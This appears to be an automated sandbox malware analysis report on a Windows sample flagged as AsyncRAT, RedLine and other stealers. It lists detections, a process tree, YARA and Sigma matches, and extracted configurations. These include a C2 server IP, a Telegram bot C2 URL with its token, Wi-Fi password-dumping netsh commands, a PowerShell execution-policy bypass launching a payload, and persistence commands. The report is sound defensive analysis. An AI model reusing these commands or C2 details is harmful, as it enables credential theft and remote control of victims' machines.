Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xj40xovMsm.exe

Overview

General Information

Sample name:xj40xovMsm.exe
renamed because original name is a hash value
Original sample name:1082572a44d4c41214a3c38dcd8289f9.exe
Analysis ID:1468518
MD5:1082572a44d4c41214a3c38dcd8289f9
SHA1:d1e83fbdc0bfaa92334eb043e3f37bbe1104cd68
SHA256:9085e6327177bb47cf43a8d8ed0c24fcfd50cde4199c5130f2b97b2508e9aabc
Tags:AsyncRATexeRAT
Infos:

Detection

AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected AveMaria stealer
Yara detected Keyzetsu Clipper
Yara detected MicroClip
Yara detected PureLog Stealer
Yara detected RL STEALER
Yara detected RedLine Stealer
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected VenomRAT
Yara detected WorldWind Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executable to a common third party application directory
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites Mozilla Firefox settings
Performs DNS queries to domains with low reputation
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file overlay found
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • xj40xovMsm.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\xj40xovMsm.exe" MD5: 1082572A44D4C41214A3C38DCD8289F9)
    • relog.exe (PID: 7152 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • 3CBD.tmp.Installer.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe" MD5: BED8CDCED2D57BE2BD750F0F59991ECD)
          • schtasks.exe (PID: 2180 cmdline: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • accc.exe (PID: 7324 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: BED8CDCED2D57BE2BD750F0F59991ECD)
          • cmd.exe (PID: 7344 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7424 cmdline: timeout 7 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • 4336.tmp.Server.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe" MD5: 68FAD5F5F8DE1C290DF5D3754B4AF358)
          • cmd.exe (PID: 6348 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6656 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 3736 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 7544 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 5356 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1340 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 5300 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • 476D.tmp.Server.exe (PID: 420 cmdline: "C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe" MD5: 68FAD5F5F8DE1C290DF5D3754B4AF358)
          • cmd.exe (PID: 7020 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3896 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 4624 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 7396 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 5296 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3696 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 8000 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • 4BC4.tmp.Client.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe" MD5: 43F955115DFBA87CA3593A18EFD58CEF)
        • 5087.tmp.update.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe" MD5: C709136E78750FEB6CB85F99EDA16629)
          • cmd.exe (PID: 7816 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7908 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • svchost.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C709136E78750FEB6CB85F99EDA16629)
              • cmd.exe (PID: 7548 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 7468 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • jqnnpe.exe (PID: 5184 cmdline: "C:\Users\user\AppData\Local\Temp\jqnnpe.exe" MD5: C28490DA01887AA59D82C54B576DC107)
        • 53A5.tmp.update.exe (PID: 7508 cmdline: "C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe" MD5: C709136E78750FEB6CB85F99EDA16629)
        • 5E16.tmp.aaa.exe (PID: 7640 cmdline: "C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe" MD5: E52BA92D25281E90AA7F27BD3719951F)
        • 62AB.tmp.build.exe (PID: 7672 cmdline: "C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe" MD5: 7081E613321921500B70899FDDB56A4D)
        • xj40xovMsm.exe (PID: 7208 cmdline: "C:\Users\user\Desktop\xj40xovMsm.exe" MD5: 1082572A44D4C41214A3C38DCD8289F9)
          • relog.exe (PID: 7536 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)
        • accc.exe (PID: 6896 cmdline: "C:\ProgramData\KMSAuto\accc.exe" MD5: BED8CDCED2D57BE2BD750F0F59991ECD)
        • svchost.exe (PID: 796 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C709136E78750FEB6CB85F99EDA16629)
        • Service_{B955B2CC07A01546086603}.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe" MD5: 839B3EFD5782B6FC122855665F3AA202)
          • relog.exe (PID: 7032 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)
        • Service_{B955B2CC07A01546086603}.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe" MD5: 839B3EFD5782B6FC122855665F3AA202)
          • relog.exe (PID: 4916 cmdline: C:\Windows\system32\relog.exe MD5: F445286ECB5A74AAF2C103D05879F1C1)
  • svchost.exe (PID: 3244 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}
{"C2 url": "https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendMessage"}
{"Server": "94.232.249.204", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "qV8NRtqxj5c3", "Autorun": "true", "Group": "null"}
{"C2 url": ["{\"result\":200"], "Bot Id": "\"lat\":"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      dump.pcapWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0x243076:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0x2536b7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0x26a5b9:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0x149460:$a2: Stub.exe
      • 0x14950a:$a2: Stub.exe
      • 0x244649:$a2: Stub.exe
      • 0x2446d9:$a2: Stub.exe
      • 0x2560c1:$a2: Stub.exe
      • 0x256151:$a2: Stub.exe
      • 0x189bef:$a3: get_ActivatePong
      • 0x1bc000:$a3: get_ActivatePong
      • 0x23f839:$a3: get_ActivatePong
      • 0x24e552:$a3: get_ActivatePong
      • 0x194396:$a4: vmware
      • 0x1c67a7:$a4: vmware
      • 0x243320:$a4: vmware
      • 0x253915:$a4: vmware
      • 0x1946f6:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x1c6a6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x253747:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x189b14:$a6: get_SslClient
      dump.pcapINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
      • 0x19068b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
      • 0x1c2a9c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
      dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x2d5ffa:$x1: AsyncRAT
      • 0x2d6038:$x1: AsyncRAT
      • 0x149460:$s4: Stub.exe
      • 0x14950a:$s4: Stub.exe
      • 0x21e890:$s4: Stub.exe
      • 0x244649:$s4: Stub.exe
      • 0x2446d9:$s4: Stub.exe
      • 0x2560c1:$s4: Stub.exe
      • 0x256151:$s4: Stub.exe
      • 0x188b6d:$s6: VirtualBox
      • 0x1943a4:$s6: VirtualBox
      • 0x1baf7e:$s6: VirtualBox
      • 0x1c67b5:$s6: VirtualBox
      • 0x24332e:$s6: VirtualBox
      • 0x253923:$s6: VirtualBox
      • 0x18e273:$s8: Win32_ComputerSystem
      • 0x19430a:$s8: Win32_ComputerSystem
      • 0x1c0638:$s8: Win32_ComputerSystem
      • 0x1c671b:$s8: Win32_ComputerSystem
      • 0x22f4e0:$s8: Win32_ComputerSystem
      • 0x243294:$s8: Win32_ComputerSystem
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\svchost.exeWindows_Trojan_Asyncrat_11a11ba1unknownunknown
          • 0xa25b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
          • 0xb638:$a2: Stub.exe
          • 0xb6c8:$a2: Stub.exe
          • 0x6ee8:$a3: get_ActivatePong
          • 0xa473:$a4: vmware
          • 0xa2eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
          • 0x7c89:$a6: get_SslClient
          C:\Users\user\AppData\Roaming\svchost.exeINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
          • 0xa2ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
          C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            Click to see the 52 entries
            SourceRuleDescriptionAuthorStrings
            00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x91eb:$x1: AsyncRAT
            • 0x9229:$x1: AsyncRAT
            • 0x9b23:$x1: AsyncRAT
            • 0x9b61:$x1: AsyncRAT
            • 0xa837:$x1: AsyncRAT
            • 0xa875:$x1: AsyncRAT
            00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
                • 0x530d2:$s1: file:///
                • 0x52fda:$s2: {11111-22222-10009-11112}
                • 0x53062:$s3: {11111-22222-50001-00000}
                • 0x4d4fc:$s4: get_Module
                • 0x4d9bb:$s5: Reverse
                • 0x52991:$s6: BlockCopy
                • 0x52ad4:$s7: ReadByte
                • 0x530e4:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  Click to see the 133 entries
                  SourceRuleDescriptionAuthorStrings
                  24.2.svchost.exe.6a20000.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    2.2.explorer.exe.8b90000.0.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                    • 0x1245e:$s2: ReflectiveLoader@
                    2.0.explorer.exe.8cb0000.1.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                    • 0x1325e:$s2: ReflectiveLoader@
                    14.0.5087.tmp.update.exe.6f0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      14.0.5087.tmp.update.exe.6f0000.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
                      • 0xa25b:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
                      • 0xb638:$a2: Stub.exe
                      • 0xb6c8:$a2: Stub.exe
                      • 0x6ee8:$a3: get_ActivatePong
                      • 0xa473:$a4: vmware
                      • 0xa2eb:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                      • 0x7c89:$a6: get_SslClient
                      Click to see the 72 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, ProcessId: 7408, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , ProcessId: 7468, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7952, ProcessName: svchost.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\xj40xovMsm.exe, ProcessId: 6784, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Service_Adobe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\xj40xovMsm.exe, ProcessId: 6784, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Service_Adobe.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe, ParentProcessId: 6828, ParentProcessName: 3CBD.tmp.Installer.exe, ProcessCommandLine: "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /f, ProcessId: 2180, ProcessName: schtasks.exe
                      Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, ProcessId: 5720, TargetFilename: C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7816, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7952, ProcessName: svchost.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7548, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' , ProcessId: 7468, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3244, ProcessName: svchost.exe

                      Stealing of Sensitive Information

                      barindex
